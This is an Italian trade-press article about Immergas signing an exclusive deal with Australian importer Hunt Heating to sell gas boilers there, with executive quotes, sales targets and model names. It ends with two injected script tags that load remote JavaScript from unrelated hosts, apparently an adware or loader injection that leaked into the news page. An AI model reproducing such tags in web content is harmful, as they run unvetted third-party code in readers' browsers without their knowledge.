Immergas entra da protagonista nel mercato Asia Pacifico e stringe un accordo commerciale con l’australiana Hunt Heating per sviluppare le vendite di caldaie a gas partendo dallo stato di Victoria. L’annuncio ufficiale sarà dato congiuntamente da Immergas e da Hunt Heating nel corso di un meeting organizzato il 5 aprile in occasione dell’inaugurazione del nuovo show room, una sala prove dedicata ai prodotti Immergas a Keysborough, un distretto industriale vicino a Melbourne.
“Siamo orgogliosi di portare in Australia il marchio Immergas – spiega Paul Linley General Manager Hunt Heating – e vediamo per le linee di prodotto studiate per il mercato australiano buone opportunità grazie alle caratteristiche tecniche innovative e al rapporto qualità-prezzo”.
“Il legame commerciale in esclusiva con Hunt Heating – commenta Andrea Benassi, direzione International Business Development Immergas - nasce da un’attenta analisi del mercato Asia Pacifico avviata nel 2011 che offre a Immergas nuovi punti di approdo. L’obiettivo si attesta a 4mila caldaie vendute l’anno con un piano di sviluppo su base pluriennale (fino al 2017) che si estenderà anche alla Nuova Zelanda”.
“Immergas è strutturata sui mercati esteri fin dal 1991 - spiega Alfredo Amadei, vice presidente Immergas - le filiali sono a oggi 9. La rete che ora tocca 30 paesi crescerà ancora e nel 2013 prevediamo un forte impulso nelle vendite in Australia”.
Hunt Heating quindi è il nuovo importatore per l’Australia di Immergas e stando ai primi test di vendita l’accoglienza dei prodotti “Made in Brescello” è positiva. I primi modelli studiati e prodotti espressamente dal team Ricerca & Sviluppo di Immergas per il mercato australiano sono le caldaie a gas Immergas HE 30 System External X e la SE 32 SystemExternal X, entrambe caratterizzate da un innovativo contenitore in acciaio che consente il montaggio in ambiente esterno con la massima sicurezza come è richiesto nelle abitazioni australiane, ma in breve tempo la gamma Immergas Australia arriverà a 5 modelli grazie all’introduzione delle nuove HE 30 Combi Internal, HE 30 System Internal X e della SE 32 System Internal X. Tutte le caldaie Immergas hanno ottenuto le certificazioni tecniche necessarie sul mercato australiano.
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>